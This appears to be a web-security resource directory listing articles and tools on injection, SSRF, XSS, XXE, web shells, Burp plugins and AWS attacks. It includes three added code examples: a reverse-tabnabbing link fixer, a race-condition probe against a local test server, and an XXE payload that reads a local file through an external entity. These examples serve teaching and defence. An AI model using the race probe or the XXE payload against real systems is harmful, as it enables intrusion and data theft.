- Hacking NodeJS and MongoDB - websecurify
- mongoaudit
- mongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.
- MS-SQL
- MySQL
- NoSQL
- Nosql-Exploitation-Framework
- A framework for NoSQL scanning and exploitation
- Making Mongo Cry Attacking NoSQL for Pen Testers Russell Butturini
- MongoDB: Typical Security Weaknesses in a NoSQL DB
- MongoDB Pentesting for Absolute Beginners
- PostgreSQL
- Oracle SQL
- "How I hacked PacketStorm" - rain forest puppy
- Albatar
- Albatar is a SQLi exploitation framework in Python
- 101
- Articles/Blogposts/Writeups
- Tools
- dotdotpwn
- A very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers and web platforms such as CMSs, ERPs, blogs, etc.
- 101
- Articles/Blogposts/Writeups
- Prototype Pollution Affecting jquery package, versions <3.4.0 - snyk.io
- After three years of silence, a new jQuery prototype pollution vulnerability emerges once again - Liran Tal
- Prototype pollution attack (lodash) - holyvier
- Inheritance and the prototype chain - MozillaDevNetwork
- Prototype pollution attack through jQuery $.extend - Asger Feldthaus(HackerOne)
- Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup - Anirudh Anand
- Prototype Pollution - Michal Bentkowski
- Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michal Bentkowski
- Presentations, Talks, Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Tools
- Talks/Presentations/Videos
- Reflected File Download - A New Web Attack Vector - BHEU 2014
- Skip to 19:24 for technical content
- Paper
- Reflected File Download - A New Web Attack Vector - BHEU 2014
- 101
- Relative Path Overwrite Explanation/Writeup
- RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- General
- AllThingsSSRF
- This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages
- Cracking the Lens: Targeting HTTP's Hidden Attack Surface
- Presentations, Talks, Videos
- Writeups
- SSRF VS BUSINESS-CRITICAL APPLICATIONS PART 1: XXE TUNNELING IN SAP NET WEAVER - erpscan
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Orange Tsai - BH USA 17
- curl Based SSRF Exploits Against Redis
- Pivoting from blind SSRF to RCE with HashiCorp Consul
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- Airbnb – Chaining Third-Party Open Redirect into Server-Side Request Forgery (SSRF) via LivePerson Chat - Brett Buerhaus
- Testing
- Tools
- General
- Testing
- General
- Server-Side Template Injection: RCE for the modern webapp
- Server-Side Template Injection
- Video
- This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.
- Purposefully Vulnerable Webapps
- Breakable Flask
- A simple vulnerable Flask application.
- Hackable
- A Python Flask app that is purposely vulnerable to SQL injection and XSS attacks
- Injecting Flask - Nvisium
- Writeups
- Tools
- tplmap
- Code and Server-Side Template Injection Detection and Exploitation Tool
- Templates Injections - PayloadsAllTheThings
- Exploiting Custom Template Engines - Dalton Campbell
- Articles
- Detection
- Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
- Look at PHP obfuscation methods for webshells
- NeoPI
- What is NeoPI? NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
- Shell Detector
- Shell Detector is an application that helps you find and identify php/cgi(perl)/asp/aspx shells. Shell Detector has a “web shells” signature database that helps to identify a “web shell” with up to 99% accuracy.
- Loki - Simple IOC Scanner
- Scanner for Simple Indicators of Compromise
- Tools
- Weevely
- Weevely is a command line web shell, dynamically extended over the network at runtime, used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low-footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper into internal networks.
- Getting Started
- b374k shell 3.2
- This PHP shell is a useful tool for system or web administrators to do remote management without using cPanel or connecting via SSH, FTP, etc. All actions take place within a web browser.
- Simple websockets based webshell
- JSShell
- An interactive multi-user web based JS shell written in Python with Flask (for server side) and of course Javascript and HTML (client side). It was initially created to debug remote esoteric browsers during tests and research. I'm aware of other purposes this tool might serve, use it at your own responsibility and risk.
- htshells
- Self contained web shells and other attacks via .htaccess files.
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts.com
- 101
- Types of Cross-Site Scripting - OWASP
- Postcards from a Post-XSS World - Michael Zalewski
- This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
- ["Gimme a bit!" - Exploring Attacks in the "Post-XSS" World - Takashi Yoneuchi]
- Bypass Techniques/Writeups
- XSS bypass strtoupper & htmlspecialchars
- Is htmlspecialchars enough to prevent an SQL injection on a variable enclosed in single quotes? - StackOverflow
- XSS Web Filter Bypass list - rvrsh3ll
- XSS Filter Bypass List
- XSS without parentheses and semi-colons - Gareth Heyes
- Bypass XSS filters using JavaScript global variables - theMiddle
- Bypass XSS Protection with xmp, noscript, noframes.. etc.. - Hahwul
- Executing non-alphanumeric JavaScript without parenthesis - Gareth Heyes
- Non-alphanumeric code With JavaScript & PHP - Gareth Heyes
- CTF Challenge: INS Hack 2019 / Bypasses Everywhere -corb3nik
- DOM-based
- Presentations, Talks, Videos
- Self XSS: we’re not so different you and I - Mathias Karlsson
- Scriptless Attacks – Stealing the Pie Without Touching the Sill
- Due to their high practical impact, Cross-Site Scripting (XSS) attacks have attracted a lot of attention from the security community members. In the same way, a plethora of more or less effective defense techniques have been proposed, addressing the causes and effects of XSS vulnerabilities. As a result, an adversary often can no longer inject or even execute arbitrary scripting code in several real-life scenarios. In this paper, we examine the attack surface that remains after XSS and similar scripting attacks are supposedly mitigated by preventing an attacker from executing JavaScript code. We address the question of whether an attacker really needs JavaScript or similar functionality to perform attacks aiming for information theft. The surprising result is that an attacker can also abuse Cascading Style Sheets (CSS) in combination with other Web techniques like plain HTML, inactive SVG images or font files. Through several case studies, we introduce the so-called scriptless attacks and demonstrate that an adversary might not need to execute code to preserve his ability to extract sensitive information from well protected websites. More precisely, we show that an attacker can use seemingly benign features to build side channel attacks that measure and exfiltrate almost arbitrary data displayed on a given website. We conclude this paper with a discussion of potential mitigation techniques against this class of attacks. In addition, we have implemented a browser patch that enables a website to make a vital determination as to being loaded in a detached view or pop-up window. This approach proves useful for prevention of certain types of attacks we here discuss.
- Mutation XSS
- What is mutation XSS (mXSS)? - StackOverflow
- How mXSS attacks change everything we believed to know so far - Mario Heiderich - OWASP AppSec EU 2013
- mXSS - TheSpanner
- Exploiting the unexploitable with lesser known browser tricks - filedescriptor
- Running Your Instance of Burp Collaborator Server - blog.fabiopires.pt
- Piercing the Veil: Server Side Request Forgery to NIPRNet access
- Testing
- XSS Test String Dump
- HTML Purifier XSS Attacks Smoketest
- Cross-site scripting (XSS) cheat sheet - PortSwigger
- This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2019. Last updated: Fri, 08 Nov 2019
- Training
- XSS-Game.appspot
- Firing-Range
- Firing Range is a test bed for web application security scanners, providing synthetic, wide coverage for an array of vulnerabilities.
- XSSer
- prompt.ml - XSS Injection Game
- alert1 to win - XSS Injection Game
- Tools
- xsscrapy
- XSS Sniper
- Xenotix
- OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework.
- xssValidator
- This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
- Shuriken
- Cross-Site Scripting (XSS) command line tool for testing lists of XSS payloads on web apps.
- XSStrike
- XSStrike is an advanced XSS detection and exploitation suite.
- iframeBusterXSS
- Check for known iframeBuster XSS
- Writeups
- Writing an XSS Worm
- XSS without HTML: Client-Side Template Injection with AngularJS
- XSS in AngularJS video series (walkthrough) - explaining some AngularJS sandbox bypasses, which resulted in the removal of the sandbox in 1.6
- Chaining Cache Poisoning To Stored XSS - Rohan Aggarwal
- Stealing JWTs in localStorage via XSS - David Roccasalva
- Penetration testing & window.opener — XSS vectors part 1 - Josh Graham
- A Questionable Journey From XSS to RCE - Dominik Penner
- Firefox uXSS and CSS XSS - leucosite.com
- Referer XSS with a Side of Link Injection - doyler.net
- XSS in steam react chat client - Zemmez
- Cerberus FTP Blind Cross-Site Scripting to remote code execution as SYSTEM (Version 9 and 10) - Kevin(secu.dk)
- Winning Intigriti's XSS Challenge - Ryan Wise
- XSS in GMail’s AMP4Email via DOM Clobbering - Michal Bentkowski
- 101
- Articles/Papers/Talks/Writeups
- Tools
- Miscellaneous
- 101
- Articles/Papers/Talks/Writeups
- General
- Tools
- Puppeteer
- Puppeteer is a Node library which provides a high-level API to control Chrome or Chromium over the DevTools Protocol. Puppeteer runs headless by default, but can be configured to run full (non-headless) Chrome or Chromium.
- dvcs-ripper
- Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
- Scrapy
- An open source and collaborative framework for extracting the data you need from websites.
- Miscellaneous
- WeasyPrint
- WeasyPrint is a visual rendering engine for HTML and CSS that can export to PDF. It aims to support web standards for printing. WeasyPrint is free software made available under a BSD license.
- BeautifulSoup
- 101
- Tabnabbing: A New Type of Phishing Attack - Aza Raskin
- Reverse Tabnabbing - OWASP
- Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
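Checking a page for the exposure described above is mechanical, so here is an added example (not code from the OWASP article) using only Python's html.parser: it lists anchors, areas and forms that open a new browsing context with target="_blank" but carry no rel="noopener", and rewrites them. The markup in SAMPLE_HTML is constructed for the demonstration.

```python
"""Find and fix reverse-tabnabbing links: target="_blank" without rel="noopener".
Added example on constructed markup; standard library only."""
import re
from html.parser import HTMLParser

# Constructed sample page: two exposed anchors, one exposed form, two safe links.
SAMPLE_HTML = """<ul>
<li><a href="https://partner.example/" target="_blank">Partner</a></li>
<li><a href="/docs" target="_blank" rel="nofollow">Docs</a></li>
<li><a href="https://safe.example/" target="_blank" rel="noopener noreferrer">Safe</a></li>
<li><a href="/about">About</a></li>
</ul>
<form action="https://pay.example/checkout" method="post" target="_blank"></form>
"""

_REL_RE = re.compile(r"""\brel\s*=\s*(["'])(.*?)\1""", re.IGNORECASE)


class TabnabbingFinder(HTMLParser):
    """Collects elements that open a new context while keeping window.opener."""

    def __init__(self):
        super().__init__()
        self.findings = []   # (tag, url, raw start tag as written)

    def handle_starttag(self, tag, attrs):
        if tag not in ("a", "area", "form"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("target", "").lower() != "_blank":
            return
        if "noopener" in a.get("rel", "").lower().split():
            return
        url = a.get("href") or a.get("action") or ""
        self.findings.append((tag, url, self.get_starttag_text()))


def find_tabnabbing_links(html):
    """Return [(tag, url, raw_tag)] for every exposed element in the document."""
    p = TabnabbingFinder()
    p.feed(html)
    p.close()
    return p.findings


def _harden_tag(raw):
    """Add noopener (and noreferrer, which also stops Referer leakage) to one start tag."""
    m = _REL_RE.search(raw)
    if m:
        tokens = m.group(2).split()
        present = {t.lower() for t in tokens}
        tokens += [t for t in ("noopener", "noreferrer") if t not in present]
        return raw[:m.start(2)] + " ".join(tokens) + raw[m.end(2):]
    if raw.endswith("/>"):
        return raw[:-2] + ' rel="noopener noreferrer"/>'
    return raw[:-1] + ' rel="noopener noreferrer">'


def harden_tabnabbing_links(html):
    """Rewrite every exposed start tag in place; idempotent on already-safe markup."""
    for _tag, _url, raw in find_tabnabbing_links(html):
        html = html.replace(raw, _harden_tag(raw))
    return html
```

Current browsers imply noopener for target="_blank" anchors, but window.open() calls and older engines do not, so keeping the rel explicit costs nothing. The string rewrite is for illustration: run the finder over templates and fix the source rather than post-processing rendered HTML.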
- Articles/Papers/Talks/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
- We present the first formulation of a happens-before relation for common web platform features. Developing this relation was a non-trivial task, due to complex feature interactions and browser differences. We also present a logical memory access model for web applications that abstracts away browser implementation details. Based on the above, we implemented WEBRACER, the first dynamic race detector for web applications. WEBRACER is implemented atop the production-quality WebKit engine, enabling testing of full-featured web sites. WEBRACER can also simulate certain user actions, exposing more races. We evaluated WEBRACER by testing a large set of Fortune 100 company web sites. We discovered many harmful races, and also gained insights into how developers handle asynchrony in practice.
- Tools
- Requests-Racer
- Requests-Racer is a small Python library that lets you use the Requests library to submit multiple requests that will be processed by their destination servers at approximately the same time, even if the requests have different destinations or have payloads of different sizes. This can be helpful for detecting and exploiting race condition vulnerabilities in web applications. (For more information, see motivation.md.)
- Race the Web
- Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options.
- timing_attack
- Perform timing attacks against web applications
- Race condition exploit
- Tool to help with the exploitation of web application race conditions
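The technique Requests-Racer and Race the Web automate (set up every connection first, release all requests in the same instant, then compare the responses) in an added standalone example. It is not code from either tool; the target is a constructed single-use coupon endpoint started in-process, built once with a check-then-act window and once with that window closed by a lock.

```python
"""Race-condition probe: open N connections, release all requests at once, count
how many the server accepted. Added example against a constructed in-process target."""
import http.client
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class CouponServer(ThreadingHTTPServer):
    """Constructed target with a window between 'is it used?' and 'mark it used'."""
    request_queue_size = 64   # keep every simultaneous connection in the accept backlog

    def __init__(self, address, handler, use_lock):
        super().__init__(address, handler)
        self.redeemed = False
        self.lock = threading.Lock() if use_lock else None   # None = vulnerable build


class CouponHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):        # silence per-request logging
        pass

    def _redeem(self):
        if self.server.redeemed:
            return False
        time.sleep(0.3)                  # stands in for a DB round-trip inside the window
        self.server.redeemed = True
        return True

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))   # drain body
        if self.server.lock is None:
            ok = self._redeem()
        else:
            with self.server.lock:       # fix: make check-and-mark atomic
                ok = self._redeem()
        self.send_response(200 if ok else 409)
        self.send_header("Content-Length", "0")
        self.end_headers()


def race(n_requests, use_lock):
    """Fire n_requests concurrently at a fresh server; return how many got HTTP 200."""
    server = CouponServer(("127.0.0.1", 0), CouponHandler, use_lock)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()

    barrier = threading.Barrier(n_requests)
    statuses = []

    def worker():
        conn = http.client.HTTPConnection("127.0.0.1", port, timeout=10)
        conn.connect()                   # TCP (and TLS, if used) handshake done ahead of time
        barrier.wait()                   # every thread sends in the same instant
        conn.request("POST", "/redeem", body=b"code=SAVE10")
        statuses.append(conn.getresponse().status)
        conn.close()

    threads = [threading.Thread(target=worker) for _ in range(n_requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    server.shutdown()
    server.server_close()
    return statuses.count(200)


if __name__ == "__main__":
    print("vulnerable build accepted", race(8, use_lock=False), "redemptions of one coupon")
    print("locked build accepted", race(8, use_lock=True))
```

The barrier after connect() is the whole trick: network and handshake latency is paid before the release, so the requests land within the server's window. Against a real target, compare response bodies and the resulting state (balance, redemption count) rather than status codes alone.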
- Miscellaneous
- 101
- TLS Redirection (and Virtual Host Confusion) - GrrDog
- The goal of this document is to raise awareness of a little-known group of attacks, TLS redirection / Virtual Host Confusion, and to bring all the information related to this topic together.
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- Articles/Papers/Talks/Writeups
- Tools
- 101
- XXE (Xml eXternal Entity) attack(2002) - Gregory Steuck
- XML Schema, DTD, and Entity Attacks: A Compendium of Known Techniques - Timothy D. Morgan, Omar Al Ibrahim
- Hunting in the Dark - Blind XXE
- Articles/Papers/Talks/Writeups
- Security Briefs - XML Denial of Service Attacks and Defenses(2009)
- Advice From A Researcher: Hunting XXE For Fun and Profit
- What You Didn't Know About XML External Entities Attacks
- Leading the Blind to Light! - A Chain to RCE
- What You Didn't Know About XML External Entities Attacks - Timothy D. Morgan
- Black Hat EU 2013 - XML Out-of-Band Data Retrieval
- Generic XXE Detection
- Playing with Content-Type – XXE on JSON Endpoints - NETSPI
- FileCry - The New Age of XXE - BH USA 2015
- XXE OOB exploitation at Java 1.7+ - 2014
- Security of applications that parse XML (supplementary) - 2009
- Exploiting XXE In File Upload Functionality
- XML Parser Evaluation - web-in-security.blogspot.de
- Hiding in Plain Sight: XXE Vulnerability in HP Project & Portfolio Mgmt Center - Benjamin Caudill
- Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, … - thezero
- Playing with Content-Type – XXE on JSON Endpoints(2015) - Antti Rantasaari
- www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
- Reference
- Tools
- XXEinjector
- XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications
- oxml_xxe
- This tool is meant to help test XXE vulnerabilities in file formats.
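A minimal reproduction of what these tools automate, as an added example with the Python standard library (not code from XXEinjector or oxml_xxe): the same document is parsed once with external general entities resolved and once with them disabled, and a pre-parse gate rejects any document that carries a DOCTYPE at all. The secret file, the document and the gate are constructed here.

```python
"""Classic in-band XXE against xml.sax: vulnerable vs hardened parser configuration.
Added example; the secret file and the payload are constructed locally."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Accumulates character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external_entities):
    """Parse and return the concatenated text content.
    resolve_external_entities=True is the vulnerable configuration: expat asks the
    SAX reader to fetch SYSTEM entities, which it does with urllib."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def contains_dtd(xml_bytes):
    """Cheap pre-parse gate: reject any document with a DOCTYPE, since that is where
    entity declarations (internal, external or parameter) live. Fails closed on a
    DOCTYPE string inside CDATA, which is the right direction for untrusted input."""
    return b"<!doctype" in xml_bytes.lower()


def classic_xxe_payload(file_url):
    """Constructed in-band XXE: the entity body is the target file, echoed in <item>."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "' + file_url.encode() + b'"> ]>\n'
        b'<order><item>&xxe;</item></order>'
    )


def demo():
    """Plant a secret file, attack both parser configurations, report what leaked."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("SECRET-TOKEN-1234")
        secret_path = fh.name
    try:
        payload = classic_xxe_payload(pathlib.Path(secret_path).as_uri())
        return {
            "dtd_detected": contains_dtd(payload),
            "vulnerable": parse_text(payload, resolve_external_entities=True),
            "hardened": parse_text(payload, resolve_external_entities=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print(demo())
```

The same SYSTEM entity pointed at an http:// URL is the out-of-band variant XXEinjector's OOB mode drives, and a parameter entity in an external DTD is how it retrieves files when the content is never echoed. Disabling external general entities is necessary but not sufficient for every parser; the DOCTYPE gate is the configuration-independent control.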
- Miscellaneous
- XML External Entity Injection in Jive-n (CVE-2018-5758) - Spencer Gietzen
- unindexed
- The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.
- COWL: A Confinement System for the Web
- Robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
- Paper
- Tutorials/Tips/Stuff
- OWASP Top 10: Hacking Web Applications with Burp Suite - Chad Furman
- Burp Pro : Real-life tips and tricks
- Behind enemy lines: Bug hunting with Burp Infiltrator
- Automating Web Apps Input fuzzing via Burp Macros
- Developing Burp Suite Extensions - DOYENSEC
- Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security Automation"
- Burp Suite Visual Aids - lanmaster53
- SSH "accept : too many open files" on OS X when using Burp - dewhurstsecurity.com
- Plugins
- Adapting Burp Extensions for Tailored Pentesting
- AuthMatrix
- AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.
- Autorize
- Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert, and Federico Dotta, a security expert at Mediaservice.net. Autorize was designed to help security testers by performing automatic authorization tests. With the last release Autorize also performs automatic authentication tests.
- Escalating Privileges like a Pro - Gaurav Narwani
- backslash-powered-scanner
- This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- burp-rest-api
- A REST/JSON API to the Burp Suite security tool. Upon successfully building the project, an executable JAR file is created with the Burp Suite Professional JAR bundled in it. When the JAR is launched, it provides a REST/JSON endpoint to access the Scanner, Spider, Proxy and other features of the Burp Suite Professional security tool.
- BurpSmartBuster
- A Burp Suite content discovery plugin that adds the smart into the Buster! Looks for files, directories and file extensions based on current requests received by Burp Suite.
- BurpKit
- BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional Script bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.
- collaborator-everywhere
- A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
- Co2
- Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has its own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
- distribute-damage
- Designed to make Burp evenly distribute load across multiple scanner targets, this extension introduces a per-host throttle, and a context menu to trigger scans from. It may also come in useful for avoiding detection.
- HUNT Burp Suite Extension
- HUNT is a Burp Suite extension to: 1. Identify common parameters vulnerable to certain vulnerability classes; 2. Organize testing methodologies inside of Burp Suite.
- IntruderPayloads
- Office Open XML Editor - burp extension
- ParrotNG - burp plugin
- PwnBack
- Burp Extender plugin that generates a sitemap of a website using Wayback Machine
- SAML Raider
- SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates.
- swurg
- Parses Swagger files into the BurpSuite for automating RESTful API testing – approved by Burp for inclusion in their official BApp Store.
- Burp-molly-pack
- Burp-molly-pack is Yandex security checks pack for Burp. The main goal of Burp-molly-pack is to extend Burp checks. Plugins contains Active and Passive security checks.
- NoPE Proxy
- Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.
- AutoRepeater
- Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. While Burp Suite is a very useful tool, using it to perform authorization testing is often a tedious effort involving a "change request and resend" loop, which can miss vulnerabilities and slow down testing. AutoRepeater, an open source Burp Suite extension, was developed to alleviate this effort. AutoRepeater automates and streamlines web application authorization testing, and provides security researchers with an easy-to-use tool for automatically duplicating, modifying, and resending requests within Burp Suite while quickly evaluating the differences in responses.
- Uniqueness plugin for Burp Suite
- Makes requests unique based on regular expressions. Handy for registration forms and any other endpoint that requires unique values upon every request.
- Bumpster
- The Unofficial Burp Extension for DNSDumpster.com. You simply supply a domain name and it returns a ton of DNS information and basically lays out the external network topology.
- J2EEScan
- J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- Brida
- Brida is a Burp Suite Extension that, working as a bridge between Burp Suite and Frida, lets you use and manipulate applications' own methods while tampering with the traffic exchanged between the applications and their back-end services/servers. It supports all platforms supported by Frida (Windows, macOS, Linux, iOS, Android, and QNX).
- burp-suite-error-message-checks
- Burp Suite extension to passively scan for applications revealing server error messages
- Postman-Integration
- Postman Integration is an extension for Burp to generate a Postman collection format JSON file.
- Stepper
- Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
- LinkDumper Burp Plugin
- Extract (links/possible endpoints) from responses & filter them via decoding/sorting
- Cyber Security Transformation Chef
- The Cyber Security Transformation Chef (CSTC) is a Burp Suite extension. It is built for security experts to extend Burp Suite by chaining simple operations for each incoming or outgoing message. It can also be used to quickly apply a special custom formatting to the message.
- jsonp
- jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
- Asset Discover
- Burp Suite extension to discover assets from HTTP response using passive scanning.
- Blogpost
- Dr. Watson
- Dr. Watson is a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! It's your very own discovery side kick, the Dr. Watson to your Sherlock!
- BurpExtenderHeaderChecks
- Hackbar
- Hackbar plugin for Burp
- HTTPSmuggler
- A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques. This extension has been developed by Soroush Dalili (@irsdl) from NCC Group.
- A Placement Vulnerability Study in Multi-Tenant Public Clouds
- One stop tool for auditing the security posture of AWS & GCP infrastructure.
- Cloud Security Wiki - NotSoSecure
- Cloud Security Wiki is an initiative to provide all Cloud security related resources to Security Researchers and developers at one place.
- "Serverless"
- Peeking Behind the Curtains of Serverless Platforms - Liang Wang, Mengyuan Li, Yinqian Zhang, Thomas Ristenpart, Michael Swift
- Taking on the viewpoint of a serverless customer, we conduct the largest measurement study to date, launching more than 50,000 function instances across these three services, in order to characterize their architectures, performance, and resource management efficiency. We explain how the platforms isolate the functions of different accounts, using either virtual machines or containers, which has important security implications. We characterize performance in terms of scalability, coldstart latency, and resource efficiency, with highlights including that AWS Lambda adopts a bin-packing-like strategy to maximize VM memory utilization, that severe contention between functions can arise in AWS and Azure, and that Google had bugs that allow customers to use resources for free.
- 101
- Attacking
- AWS IAM Privilege Escalation – Methods and Mitigation – Part 2 - Spencer Gietzen
- Gone in 60 Milliseconds - Intrusion and Exfiltration in Server-less Architectures
- More and more businesses are moving away from monolithic servers and turning to event-driven microservices powered by cloud function providers like AWS Lambda. So, how do we hack in to a server that only exists for 60 milliseconds? This talk will show novel attack vectors using cloud event sources, exploitabilities in common server-less patterns and frameworks, abuse of undocumented features in AWS Lambda for persistent malware injection, identifying valuable targets for pilfering, and, of course, how to exfiltrate juicy data out of a secure Virtual Private Cloud.
- Step By Step AWS Cloud Hacking - Andres Riancho(SecTor19)
- Penetration Testing AWS Storage: Kicking the S3 Bucket
- AWS pwn
- This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute. Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.
- Pivoting in Amazon Clouds - Andres Riancho - BHUSA14
- "From no access at all, to the company Amazon's root account, this talk will teach attendees about the components used in cloud applications like: EC2, SQS, IAM, RDS, meta-data, user-data, Celery; and how misconfigurations in each can be abused to gain access to operating systems, database information, application source code, and Amazon's services through its API. The talk will follow a knowledgeable intruder from the first second after identifying a vulnerability in a cloud-deployed Web application and all the steps he takes to reach the root account for the Amazon user. Except for the initial vulnerability, a classic remote file included in a Web application which grants access to the front-end EC2 instance, all the other vulnerabilities and weaknesses exploited by this intruder are going to be cloud-specific."
- Paper
- Disrupting AWS logging - Daniel Grzelak
- Abusing AWS Metadata Service - Casey Goodrich
- Step by step AWS Cloud Hacking - Andres Riancho(SecTor19)
- Abusing the AWS metadata service using SSRF vulnerabilities - Christophe Tafani-Dereeper
- Bypass GuardDuty PenTest Alerts - Nick Frichette
- Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar
- Account Jumping Post Infection Persistency & Lateral Movement In AWS - Dan Amiga, Dor Knafo(BH-US16)
- Securing the Cloud: A Story of Research, Discovery, and Disclosure - Jordan Drysdale
